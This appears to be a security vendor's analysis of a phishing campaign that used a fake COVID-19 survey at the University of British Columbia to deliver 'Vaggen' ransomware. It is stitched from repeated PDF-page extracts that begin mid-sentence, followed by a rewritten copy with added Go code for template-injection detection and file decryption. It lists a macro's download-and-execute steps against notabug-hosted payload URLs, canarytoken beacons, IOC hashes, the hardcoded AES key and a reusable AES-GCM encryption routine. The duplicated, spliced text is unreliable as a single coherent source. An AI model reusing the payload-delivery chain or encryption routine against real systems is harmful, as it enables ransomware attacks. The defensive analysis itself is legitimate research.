It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 966 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 967 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 968 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 969 of 
3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 970 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. 
When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 971 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 972 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. 
The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 973 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 974 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 975 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 976 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 977 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 978 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 979 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 980 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 981 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 982 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 983 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 984 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 985 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 986 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 987 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group.
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and Dropbox. Rather than sending the fake survey directly via email, the attacker uploaded the document to Box and Dropbox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam delivered through file sharing services without creating a number of false positives.

The attacker claimed to be a manager and added the following comment to the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately instead of publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro.
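Template injection is worth checking for directly, because the .docx itself carries no macro: the hook is an attachedTemplate relationship in word/_rels/settings.xml.rels whose target is external, and Word fetches and runs that template on open. The Go program below is an added example written for this page, not code from the original post or from Malwarebytes; it builds a constructed minimal .docx in memory (the template URL https://example.invalid/template.dotm is a placeholder, not the real hosting location) and then extracts every external template reference from it, which is the triage check an analyst would run on a suspicious document before opening it.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// relationships covers the part of an OPC .rels part that this check needs.
type relationships struct {
	Rels []struct {
		ID         string `xml:"Id,attr"`
		Type       string `xml:"Type,attr"`
		Target     string `xml:"Target,attr"`
		TargetMode string `xml:"TargetMode,attr"`
	} `xml:"Relationship"`
}

// remoteTemplates returns the target of every attachedTemplate relationship with
// TargetMode="External" in word/_rels/settings.xml.rels. That relationship is what
// Word resolves on open; the document itself can be completely macro-free.
func remoteTemplates(docx []byte) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(docx), int64(len(docx)))
	if err != nil {
		return nil, fmt.Errorf("not an OOXML container: %w", err)
	}
	var targets []string
	for _, f := range zr.File {
		if f.Name != "word/_rels/settings.xml.rels" {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		data, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return nil, err
		}
		var rels relationships
		if err := xml.Unmarshal(data, &rels); err != nil {
			return nil, err
		}
		for _, r := range rels.Rels {
			if strings.HasSuffix(r.Type, "/attachedTemplate") && strings.EqualFold(r.TargetMode, "External") {
				targets = append(targets, r.Target)
			}
		}
	}
	return targets, nil
}

// buildSampleDocx constructs, in memory, only the parts of a .docx this check reads.
// Nothing here is taken from the real lure: the template reference is whatever the
// caller passes, and external selects TargetMode="External" (remote) or a local file.
func buildSampleDocx(template string, external bool) []byte {
	mode := ""
	if external {
		mode = ` TargetMode="External"`
	}
	parts := map[string]string{
		"word/settings.xml": `<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"` +
			` xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><w:attachedTemplate r:id="rId1"/></w:settings>`,
		"word/_rels/settings.xml.rels": `<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">` +
			`<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"` +
			` Target="` + template + `"` + mode + `/></Relationships>`,
	}
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	for name, body := range parts {
		w, err := zw.Create(name)
		if err != nil {
			panic(err)
		}
		if _, err := io.WriteString(w, body); err != nil {
			panic(err)
		}
	}
	if err := zw.Close(); err != nil {
		panic(err)
	}
	return buf.Bytes()
}

func main() {
	// Constructed samples: a lure-style document pointing at a placeholder host,
	// and an ordinary document whose template is a local file.
	samples := []struct {
		name string
		data []byte
	}{
		{"lure.docx", buildSampleDocx("https://example.invalid/template.dotm", true)},
		{"report.docx", buildSampleDocx("Normal.dotm", false)},
	}
	for _, s := range samples {
		targets, err := remoteTemplates(s.data)
		if err != nil {
			panic(err)
		}
		fmt.Printf("%s: external templates = %q\n", s.name, targets)
	}
}
```

The check keys on TargetMode="External" rather than on the URL scheme, because a local template reference (the normal case) is a relative path with no mode attribute. A broader scan would apply the same test to every .rels part in the archive, since other relationship types can also carry external targets.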
The template file was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

- Gets the %APPDATA% directory
- Creates the Byxor directory in %APPDATA%
- Downloads a file from notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe and writes it as Polisen.exe
- Downloads a file from notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe and writes it as Killar.exe
- Calls the Shell function to execute killar.exe
- Checks the return value of Shell to see whether the launch succeeded (on success, Shell returns the task ID of the started program)
- If successful, sends an HTTP GET request to canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
- If not, sends an HTTP GET request to canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted when a particular event occurs; it can be very useful as an early warning system that an intruder has accessed a network.
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA. The ones involved in file encryption map to:

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming of the files is implemented as the callback of the standard Go function path/filepath.Walk.

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption algorithm is similar to the one demonstrated here.
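The scheme this section goes on to document (AES-256-GCM with the 32-byte hardcoded key, a fresh 12-byte nonce per file, and an output of nonce || ciphertext || 16-byte tag) is short enough to write out, together with the recovery step it makes possible. The Go program below is an added example for this page, neither the malware’s own code nor a Malwarebytes tool. It uses the key string the analysis recovered, but the plaintext is a constructed sample, Go’s crypto/rand stands in for the CryptGenRandom call the binary makes, and recoverTree (which walks a directory with filepath.Walk just as the ransomware does) is this example’s own design: it writes each recovered file beside its .VAGGEN original and leaves the original in place as evidence. The XXTEA-encrypted strings of the ransom note are not touched here.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"io"
	"os"
	"path/filepath"
	"strings"
)

// Key recovered from the Vaggen binary (see the analysis above): 32 bytes, hence AES-256.
const vaggenKey = "du_tar_mitt_hjart_mina_pengarna0"

const (
	nonceSize = 12 // AES-GCM standard nonce length
	tagSize   = 16 // GCM authentication tag length
	ext       = ".VAGGEN"
)

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// sealFile reproduces the layout the analysis describes: nonce || ciphertext || tag.
// Passing the nonce as Seal's destination is what places it in front of the ciphertext.
func sealFile(key, plaintext []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil { // the binary uses CryptGenRandom here
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// openFile is the recovery step: split the nonce off the front and let Open verify the
// trailing tag. A wrong key or a damaged file fails authentication instead of silently
// producing garbage.
func openFile(key, blob []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	if len(blob) < nonceSize+tagSize {
		return nil, errors.New("too short to contain a nonce and a tag")
	}
	return gcm.Open(nil, blob[:nonceSize], blob[nonceSize:], nil)
}

// recoverTree walks root with filepath.Walk, decrypts every *.VAGGEN file and writes the
// plaintext next to it with the extension removed. The encrypted original is kept.
// It returns the number of files recovered.
func recoverTree(root string, key []byte) (int, error) {
	recovered := 0
	err := filepath.Walk(root, func(path string, info os.FileInfo, err error) error {
		if err != nil || info.IsDir() || !strings.HasSuffix(path, ext) {
			return err
		}
		blob, err := os.ReadFile(path)
		if err != nil {
			return err
		}
		plaintext, err := openFile(key, blob)
		if err != nil {
			return fmt.Errorf("%s: %w", path, err)
		}
		if err := os.WriteFile(strings.TrimSuffix(path, ext), plaintext, 0o600); err != nil {
			return err
		}
		recovered++
		return nil
	})
	return recovered, err
}

func main() {
	key := []byte(vaggenKey)
	plaintext := []byte("constructed sample document") // constructed input, not a victim file
	blob, err := sealFile(key, plaintext)
	if err != nil {
		panic(err)
	}
	fmt.Printf("%s layout: %d nonce + %d ciphertext + %d tag = %d bytes\n",
		ext, nonceSize, len(plaintext), tagSize, len(blob))
	back, err := openFile(key, blob)
	if err != nil {
		panic(err)
	}
	fmt.Println("round trip ok:", bytes.Equal(back, plaintext))
}
```

Because GCM authenticates the ciphertext, a failed Open is a reliable signal that a file was encrypted by a different build (or key) rather than a partial, corrupt result; run the recovery on a copy of the affected tree first and stop on the first error.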
The key is hardcoded, and the 12-byte nonce is generated with CryptGenRandom. The file content is encrypted with the gcm.Seal function.

The output file (with the .VAGGEN extension) contains:

- the 12-byte nonce
- the encrypted content
- the 16-byte GCM tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.

With all these elements, we can actually recover encrypted files without having to pay the ransom. This is only possible because the key is embedded in the binary rather than generated per victim; a rebuilt sample with a different key would need the same analysis repeated. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

